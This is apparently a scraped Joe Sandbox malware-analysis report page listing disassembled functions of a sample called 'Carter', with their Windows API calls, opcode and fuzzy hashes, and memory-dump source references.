Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: __ftell_nolock__getptd_noexit__lock_file
String ID:
API String ID: 2999321469-0
Opcode ID: f928309e6565570d8e91fd09cf4b8ce11778224548b372c009bae118c849e1c2
Instruction ID: 2278c63b9d47a18583952f6311d9f5bb02408e98950479c3a8abe73c4e4d480a
Opcode Fuzzy Hash: f928309e6565570d8e91fd09cf4b8ce11778224548b372c009bae118c849e1c2
Instruction Fuzzy Hash: E7F0A031D59615DBDB00BB7488037EE72A06F83335F214206B424AB1C2CF7C8BC2BA91

Function 00C05AC3 Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C05AEF
Shell_NotifyIconW.SHELL32(00000002,?), ref: 00C05B1F

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: d4b4356f9ad8fd39db1cd6d9733e1f3e942865929041bb5b50d9a6401a56c33f
Instruction ID: 2654872c9bd2fc7b50a99b29f947e62d085e85f508cd8c53e59d35d46f666638
Opcode Fuzzy Hash: d4b4356f9ad8fd39db1cd6d9733e1f3e942865929041bb5b50d9a6401a56c33f
Instruction Fuzzy Hash: B8F0A7709183089FD7A2CB64DC457DA77BC9B4130CF0003E9BE4896292D7714B88CF56

Function 00C6C355 Relevance: 1.8, APIs: 1, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: LoadString$__swprintf
String ID:
API String ID: 207118244-0
Opcode ID: 3277c7dc31caef1f1ca1956b398eaf8d3b5e06826bfd26ac3edbc50f49d2e670
Instruction ID: 2fbac3ac38dde6199772004aa5aeeca6165714f30663bcee3e445dd37933c435
Opcode Fuzzy Hash: 3277c7dc31caef1f1ca1956b398eaf8d3b5e06826bfd26ac3edbc50f49d2e670
Instruction Fuzzy Hash: 4FB15C34A00109EFCB24DF94C891DFEB7B5FF48710F14815AF926A7291EB70AA46DB94

Function 00BFA820 Relevance: 1.7, APIs: 1, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0e5af78225d6d3d36f6d680479f726b6aede2d0f2297c8db7b636f6276ddc96
Instruction ID: c8d9d424be25b1b685e695ffd6ca4f10248cdfb6e512414523ac017c9da95b9b
Opcode Fuzzy Hash: e0e5af78225d6d3d36f6d680479f726b6aede2d0f2297c8db7b636f6276ddc96
Instruction Fuzzy Hash: BC61CFB460020ADFCB18DF50C881A7AB7F9EF44350F1581ADEE1A9B291D7B4ED89CB51

Function 00BFD679 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9a08d1ec6d7161330d8e9e2bd21197032675221cebe6db00f711b1d683b4fbb
Instruction ID: 6a68fc5d3b05d01211ed1d0f3b054605e57f0ab3fed61265f3b30672e20dfc07
Opcode Fuzzy Hash: e9a08d1ec6d7161330d8e9e2bd21197032675221cebe6db00f711b1d683b4fbb
Instruction Fuzzy Hash: 35518F35600608AFCB14EB64C991EBE77E6AF45310F1581A8F91AAB3D2CB31EE05DB50

Function 00C0343F Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C0351A

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
Instruction ID: ccaec073273687724399d8531bb99d587ffed81aea824c68e591fcd24824f2c3
Opcode Fuzzy Hash: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
Instruction Fuzzy Hash: 7531F279604A42DFC724DF59D480A21FBA8FF09310B14C56AE99A8F7A1D730ED82DB84

Function 00C0410A Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00C041B2

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: f39e02d5aea4e7c0b9bf6c86e77ae0de04898203a4b9c10d15368247393b3bb9
Instruction ID: 97b66b330a4fcf3eacf74cd5d24d3a1e452d6ad403ef14f76a650aa9bca40096
Opcode Fuzzy Hash: f39e02d5aea4e7c0b9bf6c86e77ae0de04898203a4b9c10d15368247393b3bb9
Instruction Fuzzy Hash: E63150B1A00616AFCB18CF6DC88469EB7B5FF54310F158619ED1593750D770BDA0CB90

Function 00C2E2DF Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00C2E2EA

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: fe67bdb7c06f922a953f8f5aa1e16c1727c70fdee4620919c42932c2a1a84d6d
Instruction ID: f16cacc6c9bea14d8382b9aedfcb6498368f152bb2e0a6115b6d0fe9df20d71d
Opcode Fuzzy Hash: fe67bdb7c06f922a953f8f5aa1e16c1727c70fdee4620919c42932c2a1a84d6d
Instruction Fuzzy Hash: 70413774508355DFDB24DF14C484B2ABBE1BF45308F0989ACE9899B362C332EC89DB52

Function 00C049C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C04B29: FreeLibrary.KERNEL32(00000000,?), ref: 00C04B63

Part of subcall function 00C1547B: __wfsopen.LIBCMT ref: 00C15486

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00C027AF,?,00000001), ref: 00C049F4

Part of subcall function 00C04ADE: FreeLibrary.KERNEL32(00000000), ref: 00C04B18

Part of subcall function 00C048B0: _memmove.LIBCMT ref: 00C048FA

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 18f31f35d69d38ced68f22fb0a3e570848309930af90f51c52ce150bd242feb5
Instruction ID: 9b34021930cb2347cb98092b9f0f587cef7f5a166c50d2555cb816f5df439eda
Opcode Fuzzy Hash: 18f31f35d69d38ced68f22fb0a3e570848309930af90f51c52ce150bd242feb5
Instruction Fuzzy Hash: B311C172790205ABDB18FB648D06FAF76A99F40701F208429F742AA1C1EA709A14FB94

Function 00C2E3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00C2E3CE

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 1e98ea112e757623ea4339975c03c3122bb798de3c4fe2fd8103805c005d1684
Instruction ID: fecf2896235f7aebf6e7d11008be90bf1448d436bdaa62818b0cb14752d30a59
Opcode Fuzzy Hash: 1e98ea112e757623ea4339975c03c3122bb798de3c4fe2fd8103805c005d1684
Instruction Fuzzy Hash: 032125B4908355DFCB64DF54C444B2ABBE0BF88304F0949ACFA8A57722C331E849DB92

Function 00C04220 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00C03CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00C04276

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 6b988d57886d80533733a6f2e950cad746356de01dd3f511455b66a6b5a06570
Instruction ID: 8a7dc0ffa519293a851244ec223d5854b41b0f8d5602c99ede061bd85925dcb2
Opcode Fuzzy Hash: 6b988d57886d80533733a6f2e950cad746356de01dd3f511455b66a6b5a06570
Instruction Fuzzy Hash: 74113AB12047019FD724CF55C480B67B7F9EF88710F10C92DEAAA86A90D770E945CB60

Function 00C01A36 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C01A77

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
Instruction ID: 426237a0fa59685c2513bf1ed1fb8b29cf5fd995f27c9bcb44c45a37fe0af63d
Opcode Fuzzy Hash: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
Instruction Fuzzy Hash: 2B0126722007016EC3205F38D802BA7FB98DB447A0F14852AFA1ACA1D1EA71E580E7A0

Function 00C4FEF8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C4FF33

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: cc5625e1f20a0cd097ccf851359f3205128236cd68aebd9dbd04220413b2413c
Instruction ID: 01201d62faeace31aa34f280977121c08d92ad4185101fb05ef5b3996313d003
Opcode Fuzzy Hash: cc5625e1f20a0cd097ccf851359f3205128236cd68aebd9dbd04220413b2413c
Instruction Fuzzy Hash: FA01F9322002156BCB14DF2DC89196BB7E9FFC6364714843EF90ECB205E631E902C790

Function 00C57C7F Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00C10FE6: std::exception::exception.LIBCMT ref: 00C1101C
Part of subcall function 00C10FE6: __CxxThrowException@8.LIBCMT ref: 00C11031

_memset.LIBCMT ref: 00C57CB4

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Exception@8Throw_memsetstd::exception::exception
String ID:
API String ID: 525207782-0
Opcode ID: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
Instruction ID: e6dc72b62c6fa0c9290a4b7badb5a459e5ae4d528f55e98c3ed9f9c3502c57e5
Opcode Fuzzy Hash: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
Instruction Fuzzy Hash: 2801F6742042049FD321EF5CD542F46BBE1AF5E310F25849AF5888B392DBB2E881EB94

Function 00C2DC5A Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 00C10FE6: std::exception::exception.LIBCMT ref: 00C1101C
Part of subcall function 00C10FE6: __CxxThrowException@8.LIBCMT ref: 00C11031

_memmove.LIBCMT ref: 00C2DC8B

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Exception@8Throw_memmovestd::exception::exception
String ID:
API String ID: 1602317333-0
Opcode ID: 622f045ca02a7aa9060e93de149df61a25bdc93ff1b8cc602b6dbfb0cb7149fa
Instruction ID: 17e2316c48bd1dff012886d7a0fcf5e87ff34649f80116bab08f0032a81c1c08
Opcode Fuzzy Hash: 622f045ca02a7aa9060e93de149df61a25bdc93ff1b8cc602b6dbfb0cb7149fa
Instruction Fuzzy Hash: 17F01274604101DFD714DF68C582E55BBE1BF1E300B35849CE5898B352E773D891EB91

Function 00C04A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

_fseek.LIBCMT ref: 00C04AA4

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: _fseek
String ID:
API String ID: 2937370855-0
Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction ID: 351ebb7d055241f5f85393777cfbb77557b146f08a5158c4d71ffb4e0e25f836
Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction Fuzzy Hash: B3F085B6500208FFDF148F85DC00CEBBB79EF89320F10459CFA045A210D232EA61EBA0

Function 00C04A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00C027AF,?,00000001), ref: 00C04A63

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: f1629c2039cb7f53f6fb854e56784ce0b6d304dbace421eb7e6342a422b081bb
Instruction ID: 8227564345c5e921587f8a2c58be1a8336d1f2c1dd252e903f8d6edbbb5e2794
Opcode Fuzzy Hash: f1629c2039cb7f53f6fb854e56784ce0b6d304dbace421eb7e6342a422b081bb
Instruction Fuzzy Hash: C7F015B1245701CFCB389F65E49481BBBF5AF94325320892EE2E683650C731AA84EB54

Function 00C04AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00C04AD0

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction ID: ae6d65d6465a98dc06b9e6747c90de0b2c38f2fe8f0e1fba43544b3d7e888d33
Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction Fuzzy Hash: 33F0587240020DFFDF04DF80C941EAABB79FB14314F208189F9198A252D336DA21EB90

Function 00C109C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00C109E4

Part of subcall function 00C01821: _memmove.LIBCMT ref: 00C0185B

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: f87c96f314dfed36ea47a747b559bd2369cdd00a354412bb4fcd2dd979ee2d7f
Instruction ID: 47fd62274c3817f1e03c2edc04b0e8a45641cb46ed939f388c96e615d844c0e4
Opcode Fuzzy Hash: f87c96f314dfed36ea47a747b559bd2369cdd00a354412bb4fcd2dd979ee2d7f
Instruction Fuzzy Hash: B5E0CD3290012857C721D6989C05FEEB7EDDF89790F0542B6FD0CD7354D9609D8186D1

Function 00C54D18 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00C54D31

Part of subcall function 00C01821: _memmove.LIBCMT ref: 00C0185B

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: FolderPath_memmove
String ID:
API String ID: 3334745507-0
Opcode ID: 80d52f5f02cb7a60d073a97877c52aac9e339e6f67f06083488f2a1833dac29b
Instruction ID: b341d3f6eb774c693809a4377fd2036853ca04a8fb4c5caaadb2c60d181f099e
Opcode Fuzzy Hash: 80d52f5f02cb7a60d073a97877c52aac9e339e6f67f06083488f2a1833dac29b
Instruction Fuzzy Hash: 59D05EB190032C3BDB60E6A49C0DEBB7BACD744220F0007A1BD5CD3142E9249D4586E0

Function 00C5394D Relevance: 1.5, APIs: 1, Instructions: 20fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00C5384C: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000001,00000000,00000000,00C53959,00000000,00000000,?,00C405DB,00CA8070,00000002,?,?), ref: 00C538CA

WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,?,00C405DB,00CA8070,00000002,?,?,?,00000000), ref: 00C53967

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
